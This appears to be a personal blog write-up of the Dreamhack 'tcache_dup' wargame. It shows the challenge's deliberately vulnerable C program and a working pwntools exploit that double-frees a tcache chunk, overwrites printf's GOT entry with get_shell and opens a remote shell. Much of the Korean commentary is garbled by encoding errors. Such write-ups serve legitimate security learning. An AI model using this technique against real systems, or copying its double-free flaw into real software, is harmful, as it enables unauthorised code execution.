TIL: tcache poisoning 1 ๐๏ธ
Wargame: tcache_dup
๋ฌธ์ ์ ์์ค ์ฝ๋๋ ์๋์ ๊ฐ๋ค.
// gcc -o tcache_dup tcache_dup.c -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
char *ptr[10];
void alarm_handler() {
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(60);
}
int create(int cnt) {
int size;
if(cnt > 10) {
return -1;
}
printf("Size: ");
scanf("%d", &size);
ptr[cnt] = malloc(size);
if(!ptr[cnt]) {
return -1;
}
printf("Data: ");
read(0, ptr[cnt], size);
}
int delete() {
int idx;
printf("idx: ");
scanf("%d", &idx);
if(idx > 10) {
return -1;
}
free(ptr[idx]);
}
void get_shell() {
system("/bin/sh");
}
int main() {
int idx;
int cnt = 0;
initialize();
while(1) {
printf("1. Create\n");
printf("2. Delete\n");
printf("> ");
scanf("%d", &idx);
switch(idx) {
case 1:
create(cnt);
cnt++;
break;
case 2:
delete();
break;
default:
break;
}
}
return 0;
}
Vulnerability Scanning
-
checksec
create์ ์ด์ฉํด ์ํ๋ size๋กmalloc์ ์คํํ ์ ์๊ณ , ๊ทธ ์์ data๋ฅผ ์ ๋ ฅํ ์ ์๋ค.free๋ฅผ ์ด์ฉํด allocateํ chunk ์ค ์ํ๋ chunk๋ฅผ freeํ ์ ์๋ค.get_shell์ ์คํํ๋ฉด shell์ ํ๋ํ ์ ์๋ค.
Exploit
from pwn import *
#p = process("./tcache_dup")
p = remote("host3.dreamhack.games", 9302)
#gdb.attach(p)
e = ELF("./tcache_dup")
def create(size, data):
p.sendlineafter("> ", "1")
p.sendlineafter("Size: ", str(size))
p.sendafter("Data: ", data)
def delete(idx):
p.sendlineafter("> ", "2")
p.sendlineafter("idx: ", str(idx))
create(0x30, "AAAA")
delete(0)
delete(0)
printf_got = e.got["printf"]
get_shell = e.symbols["get_shell"]
create(0x30, p64(printf_got))
create(0x30, "AAAA")
create(0x30, p64(get_shell))
p.interactive()
- ๋ฌธ์ ์ ์๋ฒ์์ ์ฌ์ฉ์ค์ธ libc์ ๋ฒ์ ์์๋ ์์ ์ค๋ช
ํ
tcache_entryโkey๋ฅผ ํ์ฉํ DFB ๋ฐฉ์ง๊ธฐ๋ฒ์ ์ฌ์ฉํ์ง ์๋๋ค. ๋ฐ๋ผ์ ๊ทธ๋ฅ free๋ฅผ ๋ ๋ฒ ์คํํ์ฌ DFB๋ฅผ ์ผ์ผํฌ ์ ์๋ค.
Leave a comment